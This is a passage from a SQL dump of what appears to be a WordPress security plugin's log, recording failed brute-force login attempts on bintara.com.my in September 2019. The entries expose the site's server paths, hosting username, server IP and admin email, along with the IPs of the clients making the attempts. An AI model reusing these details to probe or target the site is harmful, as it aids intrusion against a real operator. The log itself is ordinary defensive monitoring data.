08:51:33',18257464,19557096,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.251.192'),(24474,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.11.103\";s:11:\"REMOTE_PORT\";s:5:\"46764\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCgwrIp53uPsY7BKArmdwAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568710851.3064\";s:12:\"REQUEST_TIME\";s:10:\"1568710851\";}}','notice','2019-09-17 09:00:52','2019-09-17 09:00:51',17744992,19229944,'https://bintara.com.my/wp-login.php',1,0,'142.93.11.103'),(24475,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.11.103\";s:11:\"REMOTE_PORT\";s:5:\"46764\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCgwrIp53uPsY7BKArmdwAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568710851.3064\";s:12:\"REQUEST_TIME\";s:10:\"1568710851\";}}','notice','2019-09-17 09:00:53','2019-09-17 09:00:51',17906096,19229944,'https://bintara.com.my/wp-login.php',1,0,'142.93.11.103'),(24476,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.11.103\";s:11:\"REMOTE_PORT\";s:5:\"48232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCgy5S9022wVwVSW956TgAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568710860.0618\";s:12:\"REQUEST_TIME\";s:10:\"1568710860\";}}','notice','2019-09-17 09:01:01','2019-09-17 09:01:00',18256624,19556024,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.11.103'),(24477,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.135.99\";s:11:\"REMOTE_PORT\";s:5:\"41067\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCiUpS9022wVwVSW957TQAAAAQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711250.8592\";s:12:\"REQUEST_TIME\";s:10:\"1568711250\";}}','notice','2019-09-17 09:07:32','2019-09-17 09:07:31',17744992,19229944,'https://bintara.com.my/wp-login.php',1,0,'103.15.135.99'),(24478,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.135.99\";s:11:\"REMOTE_PORT\";s:5:\"41067\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCiUpS9022wVwVSW957TQAAAAQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711250.8592\";s:12:\"REQUEST_TIME\";s:10:\"1568711250\";}}','notice','2019-09-17 09:07:33','2019-09-17 09:07:31',17906096,19229944,'https://bintara.com.my/wp-login.php',1,0,'103.15.135.99'),(24479,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.135.99\";s:11:\"REMOTE_PORT\";s:5:\"41396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCiVZS9022wVwVSW957TgAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711253.8075\";s:12:\"REQUEST_TIME\";s:10:\"1568711253\";}}','notice','2019-09-17 09:07:35','2019-09-17 09:07:34',18256624,19556024,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.135.99'),(24480,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"57402\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCiq5S9022wVwVSW957hAAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711339.8927\";s:12:\"REQUEST_TIME\";s:10:\"1568711339\";}}','notice','2019-09-17 09:09:01','2019-09-17 09:09:00',17739936,19229888,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24481,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"57862\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCirtK-omY048@iBsNLRQAAAMU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711343.0886\";s:12:\"REQUEST_TIME\";s:10:\"1568711343\";}}','notice','2019-09-17 09:09:04','2019-09-17 09:09:03',18256080,19555872,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24482,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"150.95.52.70\";s:11:\"REMOTE_PORT\";s:5:\"44528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCkO7Ip53uPsY7BKArnpAAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568711740.3435\";s:12:\"REQUEST_TIME\";s:10:\"1568711740\";}}','notice','2019-09-17 09:15:42','2019-09-17 